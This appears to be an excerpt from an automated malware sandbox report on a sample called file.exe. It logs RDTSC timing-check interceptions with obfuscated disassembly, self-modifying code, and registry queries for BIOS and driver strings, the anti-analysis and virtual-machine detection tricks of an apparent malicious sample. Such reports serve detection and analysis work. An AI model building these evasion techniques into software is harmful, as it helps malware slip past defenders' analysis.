Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7036D second address: 4D70371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70371 second address: 4D70384 instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov di, cx 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov dx, ax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D916F6 second address: 4D916FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D916FA second address: 4D9170B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9170B second address: 4D9175F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2311h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007FEEE08A230Ch 0x00000010 call 00007FEEE08A2312h 0x00000015 mov bx, cx 0x00000018 pop ecx 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c mov ch, 86h 0x0000001e jmp 00007FEEE08A230Fh 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9175F second address: 4D91763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D91655 second address: 4D91670 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2311h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D91670 second address: 4D91675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D91675 second address: 4D916D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2314h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b popad 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop edx 0x00000011 push eax 0x00000012 pushfd 0x00000013 jmp 00007FEEE08A2313h 0x00000018 or ax, B15Eh 0x0000001d jmp 00007FEEE08A2319h 0x00000022 popfd 0x00000023 pop eax 0x00000024 popad 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FEEE08A230Ah 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D916D8 second address: 4D60D8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 mov dl, 0Fh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp dword ptr [74E5155Ch] 0x00000010 mov edi, edi 0x00000012 push ebp 0x00000013 mov ebp, esp 0x00000015 mov ecx, dword ptr fs:[00000018h] 0x0000001c mov eax, dword ptr [ebp+08h] 0x0000001f mov dword ptr [ecx+34h], 00000000h 0x00000026 cmp eax, 40h 0x00000029 jnc 00007FEEE0EE360Dh 0x0000002b mov eax, dword ptr [ecx+eax*4+00000E10h] 0x00000032 pop ebp 0x00000033 retn 0004h 0x00000036 test eax, eax 0x00000038 je 00007FEEE0EE3623h 0x0000003a mov eax, dword ptr [0043200Ch] 0x0000003f cmp eax, FFFFFFFFh 0x00000042 je 00007FEEE0EE3619h 0x00000044 mov esi, 0042F1C0h 0x00000049 push esi 0x0000004a call 00007FEEE5842EFDh 0x0000004f mov edi, edi 0x00000051 jmp 00007FEEE0EE360Ah 0x00000056 xchg eax, ebp 0x00000057 pushad 0x00000058 mov cl, 44h 0x0000005a call 00007FEEE0EE3613h 0x0000005f pop edx 0x00000060 popad 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 mov ecx, 0A6ACCEDh 0x0000006a movzx eax, dx 0x0000006d popad 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50463 second address: 4D504E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEEE08A2317h 0x00000009 or ax, 58AEh 0x0000000e jmp 00007FEEE08A2319h 0x00000013 popfd 0x00000014 mov ah, E9h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007FEEE08A230Ah 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov edi, 64836E40h 0x00000028 pushfd 0x00000029 jmp 00007FEEE08A2319h 0x0000002e sub al, 00000046h 0x00000031 jmp 00007FEEE08A2311h 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D504E6 second address: 4D504F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEE0EE360Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D504F6 second address: 4D504FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D504FA second address: 4D5056E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FEEE0EE3617h 0x0000000f mov ecx, dword ptr [ebp+08h] 0x00000012 pushad 0x00000013 mov dx, si 0x00000016 mov edi, esi 0x00000018 popad 0x00000019 sub eax, eax 0x0000001b jmp 00007FEEE0EE3613h 0x00000020 inc eax 0x00000021 jmp 00007FEEE0EE3616h 0x00000026 lock xadd dword ptr [ecx], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FEEE0EE3617h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5056E second address: 4D50573 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50573 second address: 4D50589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 inc eax 0x00000008 pushad 0x00000009 mov di, cx 0x0000000c mov ah, E3h 0x0000000e popad 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50589 second address: 4D5058D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5058D second address: 4D50593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50593 second address: 4D505AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FEEE08A2315h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0A44 second address: 4DA0A4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0A4A second address: 4DA0A6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2316h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0A6B second address: 4DA0A71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0CCC second address: 4DA0CDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEE08A230Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0CDE second address: 4DA0D49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FEEE0EE3619h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 call 00007FEEE0EE360Ch 0x00000018 pushfd 0x00000019 jmp 00007FEEE0EE3612h 0x0000001e sub esi, 0032DBB8h 0x00000024 jmp 00007FEEE0EE360Bh 0x00000029 popfd 0x0000002a pop esi 0x0000002b movsx edx, si 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D49 second address: 4DA0D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D4D second address: 4DA0D51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D51 second address: 4DA0D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D57 second address: 4DA0D66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEE0EE360Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D66 second address: 4DA0D8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b jmp 00007FEEE08A2315h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D8D second address: 4DA0D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D91 second address: 4DA0D97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D97 second address: 4DA0D9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D9D second address: 4DA0DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0BFC second address: 4DA0C25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 4Eh 0x00000005 mov edx, 7DC219F6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEEE0EE3619h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0C25 second address: 4DA0C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEE08A230Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0C35 second address: 4DA0C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0B51 second address: 4DA0BBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEEE08A230Fh 0x00000009 add ah, FFFFFF9Eh 0x0000000c jmp 00007FEEE08A2319h 0x00000011 popfd 0x00000012 push ecx 0x00000013 pop ebx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007FEEE08A230Ah 0x0000001f mov ebp, esp 0x00000021 jmp 00007FEEE08A2310h 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FEEE08A2317h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0BBF second address: 4DA0BD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEE0EE3614h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0A44 second address: 4DB0A8C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 57E07EEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FEEE08A2314h 0x0000000f add cx, C118h 0x00000014 jmp 00007FEEE08A230Bh 0x00000019 popfd 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FEEE08A2315h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0A8C second address: 4DB0A92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0A92 second address: 4DB0A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0A96 second address: 4DB0B0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3613h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d call 00007FEEE0EE360Fh 0x00000012 pop edi 0x00000013 pushfd 0x00000014 jmp 00007FEEE0EE3614h 0x00000019 jmp 00007FEEE0EE3615h 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FEEE0EE3618h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0B0A second address: 4DB0B10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0B10 second address: 4DB0B3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov al, F6h 0x0000000e movsx edx, si 0x00000011 popad 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FEEE0EE3611h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC071B second address: 4DC0721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC0721 second address: 4DC0725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC0725 second address: 4DC0745 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FEEE08A2310h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC0745 second address: 4DC075D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEE0EE3613h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80743 second address: 4D80749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80749 second address: 4D807B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx ecx, bx 0x0000000d pushfd 0x0000000e jmp 00007FEEE0EE3619h 0x00000013 add ecx, 272D17A6h 0x00000019 jmp 00007FEEE0EE3611h 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 jmp 00007FEEE0EE360Eh 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FEEE0EE3617h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D807B3 second address: 4D807EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 call 00007FEEE08A230Bh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007FEEE08A230Eh 0x0000001a sbb ecx, 7D9D8A08h 0x00000020 jmp 00007FEEE08A230Bh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D505CF second address: 4D5062D instructions: 0x00000000 rdtsc 0x00000002 mov eax, 585DF74Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FEEE0EE3610h 0x0000000f xor al, 00000058h 0x00000012 jmp 00007FEEE0EE360Bh 0x00000017 popfd 0x00000018 popad 0x00000019 mov dword ptr [esp], ebp 0x0000001c pushad 0x0000001d push ecx 0x0000001e mov esi, ebx 0x00000020 pop edx 0x00000021 push ecx 0x00000022 jmp 00007FEEE0EE3613h 0x00000027 pop ecx 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FEEE0EE3612h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5062D second address: 4D50680 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEEE08A2311h 0x00000009 and cl, 00000006h 0x0000000c jmp 00007FEEE08A2311h 0x00000011 popfd 0x00000012 mov esi, 033B8FB7h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ecx, dword ptr [ebp+08h] 0x0000001d jmp 00007FEEE08A230Ah 0x00000022 or eax, FFFFFFFFh 0x00000025 pushad 0x00000026 mov cl, C4h 0x00000028 movsx edx, si 0x0000002b popad 0x0000002c lock xadd dword ptr [ecx], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50680 second address: 4D50686 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50686 second address: 4D50463 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, al 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a dec eax 0x0000000b jmp 00007FEEE08A2313h 0x00000010 pop ebp 0x00000011 pushad 0x00000012 push esi 0x00000013 mov ebx, 43ED5C26h 0x00000018 pop ebx 0x00000019 popad 0x0000001a retn 0004h 0x0000001d nop 0x0000001e test eax, eax 0x00000020 jne 00007FEEE08A2313h 0x00000022 mov eax, dword ptr [esi+68h] 0x00000025 cmp eax, 00432340h 0x0000002a je 00007FEEE08A2309h 0x0000002c mov dword ptr [esi+68h], ebx 0x0000002f push ebx 0x00000030 mov edi, dword ptr [0042F014h] 0x00000036 call edi 0x00000038 mov edi, edi 0x0000003a pushad 0x0000003b push edx 0x0000003c pushfd 0x0000003d jmp 00007FEEE08A2316h 0x00000042 adc cl, FFFFFFA8h 0x00000045 jmp 00007FEEE08A230Bh 0x0000004a popfd 0x0000004b pop eax 0x0000004c pushfd 0x0000004d jmp 00007FEEE08A2319h 0x00000052 add ch, FFFFFFC6h 0x00000055 jmp 00007FEEE08A2311h 0x0000005a popfd 0x0000005b popad 0x0000005c xchg eax, ebp 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FEEE08A230Dh 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC0859 second address: 4DC0869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEE0EE360Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC0869 second address: 4DC0882 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A230Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ax, dx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC0882 second address: 4DC08FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3618h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEEE0EE360Bh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FEEE0EE3616h 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FEEE0EE360Dh 0x00000020 adc cx, 9EC6h 0x00000025 jmp 00007FEEE0EE3611h 0x0000002a popfd 0x0000002b jmp 00007FEEE0EE3610h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D91559 second address: 4D9155F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9155F second address: 4D91563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D91563 second address: 4D9159E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FEEE08A2316h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FEEE08A2317h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9159E second address: 4D915BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 42h 0x00000005 call 00007FEEE0EE3610h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D915BF second address: 4D915D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2316h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA00C5 second address: 4DA00F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov dx, 06E6h 0x00000012 call 00007FEEE0EE3617h 0x00000017 pop esi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA00F6 second address: 4DA012E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, cl 0x00000005 pushfd 0x00000006 jmp 00007FEEE08A2311h 0x0000000b and ecx, 50B4F6F6h 0x00000011 jmp 00007FEEE08A2311h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA012E second address: 4DA015E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FEEE0EE3618h 0x0000000a sub ecx, 089E7748h 0x00000010 jmp 00007FEEE0EE360Bh 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA015E second address: 4DA01DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FEEE08A230Ch 0x00000011 add cx, 5CD8h 0x00000016 jmp 00007FEEE08A230Bh 0x0000001b popfd 0x0000001c popad 0x0000001d push esp 0x0000001e jmp 00007FEEE08A2312h 0x00000023 mov dword ptr [esp], ebx 0x00000026 pushad 0x00000027 mov ax, AF4Dh 0x0000002b mov eax, 1017F349h 0x00000030 popad 0x00000031 mov ebx, dword ptr [ebp+10h] 0x00000034 jmp 00007FEEE08A2314h 0x00000039 xchg eax, esi 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA01DB second address: 4DA01F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3619h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 825FA3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 825763 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9D9AC8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A5CF14 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
